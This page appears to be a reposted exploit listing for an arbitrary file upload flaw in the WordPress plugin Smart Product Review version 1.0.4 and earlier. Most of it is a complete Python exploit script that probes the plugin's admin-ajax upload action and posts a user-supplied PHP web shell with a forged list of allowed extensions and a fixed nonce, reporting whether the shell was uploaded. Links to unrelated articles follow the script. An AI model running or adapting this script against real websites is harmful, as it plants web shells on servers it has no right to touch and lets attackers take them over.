当前位置:网站首页>WordPress plugin smart product review 1.0.4 - upload of any file
WordPress plugin smart product review 1.0.4 - upload of any file
2022-06-23 22:13:00 【Khan security team】
supply Business Homepage :https://demo.codeflist.com/wordpress-plugins/smart-product-review/
edition :<= 1.0.4
test :Kali Linux
import os.path
from os import path
import json
import requests;
import time
import sys
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
def main():
banner()
if(len(sys.argv) != 3):
usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();边栏推荐
- Ten thousand words! Understand the inheritedwidget local refresh mechanism
- TDD development mode recommendation process
- ACL2022 | MVR:面向开放域检索的多视角文档表征
- Smart cockpit SOC competition upgraded, and domestic 7Nm chips ushered in an important breakthrough
- The latest research progress of domain generalization from CVPR 2022
- How to realize batch generation of serial number QR code
- How to correctly divide data into databases and tables
- Deep understanding of leakcanary
- What happened when the fortress remote login server was blocked? What can be done to solve it?
- Using barcode software to make certificates
猜你喜欢
Intel openvino tool suite advanced course & experiment operation record and learning summary
Teacher lihongyi from National Taiwan University - grade Descent 2
微信小程序中发送网络请求
北大、加州伯克利大學等聯合| Domain-Adaptive Text Classification with Structured Knowledge from Unlabeled Data(基於未標記數據的結構化知識的領域自適應文本分類)
Peking University, University of California Berkeley and others jointly | domain adaptive text classification with structured knowledge from unlabeled data (Domain Adaptive Text Classification Based o
Experiment 5 module, package and Library
《阿里云天池大赛赛题解析》——O2O优惠卷预测
Leetcode must review six lintcode (28348455116385)
Smart cockpit SOC competition upgraded, and domestic 7Nm chips ushered in an important breakthrough
Code implementation of CAD drawing online web measurement tool (measuring distance, area, angle, etc.)
随机推荐
[同源策略 - 跨域问题]
MySQL de duplication query only keeps one latest record
Using the provider to transform the shit like code, the amount of code is reduced by 2/3!
Take you to understand the lazy loading of pictures
How to do API gateway routing? What are the other functions of API gateway?
Don't let your server run naked -- security configuration after purchasing a new server (Basics)
How to deal with high memory in API gateway how to maintain API gateway
H264_ AVC analysis
Ffmpeg for audio and video commands
Redis function discarding Encyclopedia redis:: delete() is deprecated solution
How to deploy the API gateway? Is it OK not to use the API gateway?
Recommend several idea plug-ins
Deep understanding of leakcanary
Knowda: all in one knowledge mixture model for data augmentation in feed shot NLP
[tutorial] build librephotos using Tencent cloud lightweight application server to support photo management of face recognition!
How to use the serial port assistant in STC ISP?
高阶柱状图之极环图与极扇图
北大、加州伯克利大学等联合| Domain-Adaptive Text Classification with Structured Knowledge from Unlabeled Data(基于未标记数据的结构化知识的领域自适应文本分类)
What is zero copy?
使用 Provider 改造屎一样的代码,代码量降低了2/3!